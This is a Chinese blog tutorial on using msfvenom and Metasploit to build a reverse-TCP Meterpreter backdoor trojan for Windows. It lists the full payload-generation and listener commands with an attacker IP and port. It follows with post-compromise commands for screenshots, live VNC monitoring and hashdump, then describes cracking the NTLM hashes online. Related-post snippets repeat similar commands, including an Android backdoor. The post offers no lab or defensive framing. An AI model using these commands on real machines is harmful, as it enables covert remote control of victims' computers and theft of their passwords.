msfvenom生成远控后门木马

于 2024-04-18 22:03:12 发布
阅读量291 收藏 2
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_76389797/article/details/137938827
版权

msfvenom是Metasploit Framework 中的一个关键工具,用于生成各种类型的恶意软件载荷。并且该工具的兼容性也非常好,可以生成涵盖Windows,Linux,Macos,android等的系统的木马程序。

msfvenom的简单使用:

本人使用msfvenom是在KaliLinux中进行使用的,下面是一些简单的使用方式:

1.msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=9999 -f exe -o test.exe

这一行指令是用来生成一个借助反tcp监听的适用于Windows 64位操作系统的远控后门木马,执行完之后会在你的终端目录下生成一个名为test.exe的木马程序。

2.msfconsole

执行该指令会进入一个全新的终端,用于进行对msf的参数配置和目标机的监听。

这里可以看到,这时候的终端为msf6终端

3.use exploit/multi/handler

这句指令意思是用msf6进行攻击多个目标机,这里设置的是一个意图。

4.set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.2.134

set lport 9999

这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。

5.run

这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。

6.screenshot
run vnc
hashdump

这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。

破译方式也很简单,只需要到浏览器上输入cmd5

这里打开了在线破解网站,然后类型改为ntml,这样就可以对刚才获取的密文进行破解,这样就得到了目标机的密码了。

吹梦到西洲
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
msfvenom生成远控木马
Leiyinghui的博客
06-26 827
用于生成各种类型的恶意软件payload,可以生成针对不同操作系统和应用程序的恶意代码,如木马后门、恶意软件等,msfvenom在目标机上执行后门,在本地监听上线。查看可执行的操作,根据描述内容选择所需的命令进行操作。
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2755
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
Msfvenonm生成一个后门木马
墨鱼菜鸡
11-08 416
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通...
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 700
是msfpayload,msfencode的结合体,可利用msfvenom生成后门木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 3630
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
D盾网站源码后门木马扫描检测工具
01-27
D盾网站源码后门木马扫描检测工具
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
WebShellKill网站后门木马脚本查杀工具
11-17
WebShellKil是一款web后门专杀工具,不仅支持webshell的扫描,同时还支持暗链的扫描。是一款融合了多重检测引擎的查杀工具。能更精准地检测出WEB网站已知和未知的后门文件
后门免杀360远控
06-17
【标题】"无后门免杀360远控"所涉及的知识点主要集中在网络安全、恶意软件规避检测以及远程控制技术上。在这个标题中,“无后门”意味着该程序或工具在设计时没有预留任何可以被非法利用的安全漏洞,提高了安全性。...
木偶远控后门
11-07
木偶2009最新远控!个人去后门版!
Kali 渗透测试:Meterpreter在Windows系统下的使用
Liu_Bruce的博客
05-11 3031
Kali 渗透测试:Meterpreter在Windows系统下的使用 实 验 环 境: VMware Workstation 16 PRO 操作机:Kali Linux 5.10.0 IP(192.168.68.125) 靶机:Win7 实 验 步 骤: 1. 生成被控端payload 在操作机执行如下命令: ┌──(root💀kali)-[~] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L
msf反弹shell
cj_Hydra's Blog
02-01 1474
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
利用 msfvenom 生成木马远程操控 Windows
感谢关注
12-17 611
6.等待上钩,或者把木马发给别人(bushi)查看有无摄像头(doge)1.启动kali,切换到。,在自己的电脑上生成木马。(2)检查是否连上,显示。
【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头
人若无名,便可专心练剑
01-21 283
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
Windows提权,网络安全编程基础
最新发布
m0_60607895的博客
04-08 922
msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马:伪装成cmd.exemsfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
内网渗透之Windows反弹shell(五)
不知名白帽的博客
08-12 1737
内网渗透之Windows反弹shell(五)(08msiexec.exe、09Metasploit)
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 647
生成木马反弹和简单的Windows提权
msfvenom生成安卓后门
09-10
msfvenom是Metasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom命令创建后门。该命令的基本语法如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地主机IP地址> LPORT=<本地主机端口> -o <输出文件路径> 这里的LHOST标识我们的本地主机IP地址,LPORT标识本地主机的端口号,-o表示输出文件路径。我们可以根据自己的需要进行调整。 生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步优化生成后门,例如: - 使用其他有效载荷,如android/meterpreter/reverse_http或android/meterpreter/reverse_https,以使用HTTP或HTTPS通信。 - 添加可执行权限,以确保安卓设备可以正确执行后门应用程序。 - 使用混淆技术来隐藏后门应用程序的真实目的,增加其对抗检测工具的能力。 总之,通过使用msfvenom工具,我们能够生成定制的安卓后门,用于安全测试和研究目的。然而,请注意在任何环境中合法和道德使用此类工具,并始终遵守法律和道德准则。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值